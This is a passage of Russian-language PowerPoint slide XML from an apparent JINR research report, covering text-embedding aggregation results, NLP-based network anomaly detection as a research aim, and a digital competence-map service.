          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518200" y="895320"/>
            <a:ext cx="8281800" cy="516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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85181E01-79C2-4B07-904A-97E814B75CFE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9B246238-2C76-42B4-A3D4-AC38E7F3FE66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98E32FB-DC18-4B92-AF3B-5D0ED8446DF9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16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0" y="166330"/>
            <a:ext cx="12189960" cy="24622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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Исследование методов агрегации векторных представлений текстов различных семантических пространств. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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Использованные методы агрегации</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="PlaceHolder 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78480" y="975600"/>
            <a:ext cx="11990520" cy="536148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u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="1000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> 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01" name="Рисунок 93"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="19340" r="14944" b="4309"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6250680" y="3723480"/>
            <a:ext cx="2697120" cy="2473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2" name="Рисунок 94"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="21135" r="15010" b="20920"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9084960" y="3677760"/>
            <a:ext cx="2751840" cy="235512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403" name="Рисунок 92"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9424080" y="2535480"/>
            <a:ext cx="2645280" cy="767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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66069889-0B90-4529-8149-2EC6DD7E5903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5CE5B882-0A22-4685-91BD-E708E12D9355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575F7CF1-852C-4B89-9DAF-339AAF86970A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17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0" y="43219"/>
            <a:ext cx="12189960" cy="4924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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Исследование методов агрегации векторных представлений текстов различных семантических пространств.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1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</a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1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Использованные методы оценки устойчивости агрегированных результатов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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-61200" y="629640"/>
            <a:ext cx="5262120" cy="518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Элементы графового анализа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Анализ диаграмм размаха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Вычисление коэффициентов вариации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Построение коррелляционных матриц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Расчет коэффициента конкордации Кендалла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7" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233640" y="1494360"/>
            <a:ext cx="1864080" cy="62172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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="1000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> 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08" name="Рисунок 109"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="6969" t="5018" r="8292"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4407480" y="624240"/>
            <a:ext cx="4195080" cy="3030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9" name="Рисунок 110"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="6861" t="4271" r="8490"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217000" y="617400"/>
            <a:ext cx="3983760" cy="303768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410" name="Таблица 115"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2161005192"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4815720" y="3918600"/>
          <a:ext cx="7257600" cy="2241000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="145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3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Aggregation method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anchor="ctr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300" b="1" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1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Word2Vec</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1300" b="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent1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3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(Pearson / Spearman)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="13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anchor="ctr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300" b="1" u="none" strike="noStrike" dirty="0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FastText</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1300" b="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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3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(Pearson / Spearman)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="13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anchor="ctr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300" b="1" u="none" strike="noStrike" dirty="0"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BERT</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1300" b="0" u="none" strike="noStrike" dirty="0"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3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(Pearson / Spearman)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="13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anchor="ctr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3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MEAN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3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(Pearson / Spearman)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anchor="ctr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Average similarity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0.81 / 0.81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0.84 / 0.82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C9211E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0.58 / 0.54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300" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>0.7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>5 / 0.72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Embeddings concatenation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C9211E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0.14 / 0.12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C9211E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0.24 / 0.21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00A93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1.0 / 0.99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0.46</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" u="none" strike="noStrik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 / 0.44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PCA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0.90 / 0.89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0.89 / 0.87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C9211E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0.36 / 0.32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0.7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="13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2 / 0.69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SVD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0.82 / 0.81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0.84 / 0.82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300" b="0" u="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="C9211E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0.57 / 0.53</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="13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300" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>0.7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>5 / 0.72</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="13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11" name="Таблица 122"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3487954785"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228240" y="3166200"/>
          <a:ext cx="4244760" cy="1952760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1019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2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9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2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4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Method / Model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anchor="ctr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4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AVG_sim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4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Concat_vec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4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PCA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zxx" sz="14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SVD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1" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1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Word2Vec</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1400" b="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent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0.6123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C9211E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0.0802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0.7151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0.6180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1" u="none" strike="noStrike" dirty="0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FastText</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1400" b="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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0.6277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C9211E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0.1382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0.6827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0.6277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1" u="none" strike="noStrike" dirty="0"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BERT</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="1400" b="0" u="none" strike="noStrike" dirty="0"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C9211E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0.3726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18A30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0.9935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C9211E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0.2128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C9211E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0.3677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zxx" sz="14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MEAN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1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>0.5375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C9211E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0.4040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0.5369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400" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>0.5378</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="14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12" name="Таблица 121"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="227160" y="5170320"/>
          <a:ext cx="2405880" cy="1098720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="138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Method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Kendall’s τ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AVG </a:t>
                      </a:r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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zxx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 SVD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200" b="1" u="sng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FF00FF"/>
                          </a:highlight>
                          <a:uFillTx/>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="DejaVu Sans"/>
                        </a:rPr>
                        <a:t>0.9941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PCA </a:t>
                      </a:r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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zxx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 SVD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0.8450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PCA </a:t>
                      </a:r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&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zxx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 AVG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zxx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0.8399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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62BA6626-91F2-4C68-AD05-DF90E2673B71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9CB2D17-73B8-442D-8826-3B8B26ED621E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E0B8CDD-D61B-4FE2-AD6B-5202F08F7CE5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18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Рисунок 414"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808960" y="689400"/>
            <a:ext cx="6265080" cy="5552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6" name="Рисунок 415"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="29277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2899080"/>
            <a:ext cx="2826720" cy="3422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7" name="Рисунок 416"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222480" y="488880"/>
            <a:ext cx="5738400" cy="4510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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28A322A-886F-4E02-888E-8C9EB3E79AAB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040BAB83-33D1-409E-BBC0-C76B7B44D943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CA5E3B1-B136-4B14-8D5C-A83BFAFEA8BC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19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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7EB459-1AEA-433C-A5C7-0360F5E6B0F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="43219"/>
            <a:ext cx="12189960" cy="4924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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Исследование методов агрегации векторных представлений текстов различных семантических пространств.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Использованные методы оценки устойчивости агрегированных результатов</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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Актуальность работы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9B83B4-0E6B-4073-85D8-3F6C7897AA8A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02FD617B-215D-4F3B-B580-DDECB427008A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ABD9E3A-AB55-443D-89DA-0D9B8419B69F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2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566018-A466-4F97-8A88-4276474F2D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-180" y="782122"/>
            <a:ext cx="12189959" cy="529375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300" dirty="0"/>
              <a:t>Основные направления деятельности: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1" dirty="0"/>
              <a:t>развитие методов искусственного интеллекта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t> в рамках создания многоцелевой программно-аппаратной платформы аналитики Больших данных,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1" dirty="0"/>
              <a:t>развитие и поддержка веб-сервисов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="13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300" dirty="0"/>
              <a:t>системы планирования и учета экскурсий в ОИЯИ,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300" dirty="0"/>
              <a:t>мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC,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300" dirty="0"/>
              <a:t>цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>Современные методы обработки естественного языка (Natural Language Processing, NLP) демонстрируют </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>высокую эффективность не только в классических задачах анализа текстов, но и в смежных областях, где данные имеют ярко выраженную последовательную и лингвистическую природу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>. В частности, компоненты сетевого трафика — такие как URL-адреса, заголовки и параметры HTTP-запросов — представляют собой текстовые последовательности, содержащие скрытые семантические и структурные паттерны. Это открывает возможность применения устоявшихся NLP-подходов для их анализа: методы векторизации текста, TF-IDF, n-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0" err="1"/>
              <a:t>граммный</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t> анализ и другие техники позволяют </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>преобразовывать неструктурированные данные трафика в формализованные признаки, пригодные для машинного обучения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>На основе таких признаков можно строить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>интеллектуальные алгоритмы обнаружения аномалий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>, в том числе с использованием нейросетевых моделей. В отличие от традиционных сигнатурных систем, которые требуют предварительного описания известных угроз, модели, обученные на NLP-представлениях трафика, способны выявлять </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>сложные, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0" err="1"/>
              <a:t>слабоформализованные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t> аномалии </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>и даже атаки нулевого дня. Они распознают отклонения в статистических и лингвистических закономерностях поведения сети, что делает их особенно ценными в условиях постоянно эволюционирующих </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0" err="1"/>
              <a:t>киберугроз</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>Такой подход особенно актуален при </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>анализе трафика веб-сервисов, размещённых в публичной сети и, как следствие, подверженных широкому спектру сетевых атак</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>. Поскольку классические методы защиты часто оказываются бессильны перед новыми и модифицированными угрозами, внедрение NLP-ориентированных решений позволяет не просто реагировать на инциденты, а </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0" err="1"/>
              <a:t>проактивно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t> предотвращать их, повышая общую устойчивость информационной инфраструктуры.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>Таким образом, развитие и адаптация методов NLP для анализа сетевых данных становится не просто перспективным направлением исследований, а </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" b="1" dirty="0"/>
              <a:t>практической необходимостью в обеспечении кибербезопасности</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1300" dirty="0"/>
              <a:t>. Это особенно важно в условиях роста объёмов цифровых данных и усложнения методов атак — и напрямую способствует защите критически важной информации, а также улучшению качества решений, основанных на анализе научно-технических и оперативных данных.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1688953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Выполненные работы за 2025 год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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107640" y="666360"/>
            <a:ext cx="11806200" cy="5508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2500" lnSpcReduction="9999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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Разработка и тестирование нейронной сети для обнаружения сетевых атак к веб-сервисам ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Исследование методов агрегации векторных представлений текстов различных семантических пространств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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Работа над созданием алгоритма семантического поиска информации в базе данных цифровой карты компетенций по детекторным и ускорительным технологиям ОИЯИ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999999"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Развитие веб-сервиса мониторинга производительности задач на ресурсах, интегрированных в распределенную инфраструктуру DIRAC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C848E-490A-4F21-8B97-AB41343DBDB0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667ABA4-11A9-4D70-918E-7095E54D8C99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EDD3D71-36C1-4CA6-BCAF-B97AD5FE09F3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20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Рисунок 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4293629" y="1572778"/>
            <a:ext cx="2481793" cy="3835204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0" y="-46800"/>
            <a:ext cx="12189960" cy="67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2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Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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3" name="Прямоугольник 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1167570"/>
            <a:ext cx="4504623" cy="45228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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> — сервис, разработанный в 2023 г. при активном сотрудничестве с коллегами из ЛЯП, ЛФВЭ, ЛНФ и ЛЯР и предназначенный для поиска информации об оборудовании, компетенциях, материалах и компонентах, накопленных в ОИЯИ в ходе работ по детекторным технологическим направлениям. Сервис используется сотрудниками ЛЯП, ЛЯР, ЛФВЭ, ЛНФ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Сервис доступен всем пользователям, имеющим учетную запись в системе JINR SSO (доступен по ссылке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>https://detectors.jinr.ru)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx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ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>С начала 2025 г. количество пользователей увеличилось со 123 пользователей до 201, количество обращений к веб-сервису превышает 640 тысяч.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AB992948-61F8-4095-B122-415097E0B525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FCAE4841-6F45-4D66-8E17-9C3E8498CA42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FBE4ADC-6B48-4AF0-AC5B-009264471657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21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9" name="ДЦ">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{746D7119-D9A7-4571-AE1F-43069DD15E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4428" y="591587"/>
            <a:ext cx="5627571" cy="5627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Рисунок 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4510258" y="1572778"/>
            <a:ext cx="2481793" cy="3835204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0" y="-46800"/>
            <a:ext cx="12189960" cy="67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2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Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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3" name="Прямоугольник 422"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1167570"/>
            <a:ext cx="4504623" cy="45228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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> — сервис, разработанный в 2023 г. при активном сотрудничестве с коллегами из ЛЯП, ЛФВЭ, ЛНФ и ЛЯР и предназначенный для поиска информации об оборудовании, компетенциях, материалах и компонентах, накопленных в ОИЯИ в ходе работ по детекторным технологическим направлениям. Сервис используется сотрудниками ЛЯП, ЛЯР, ЛФВЭ, ЛНФ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
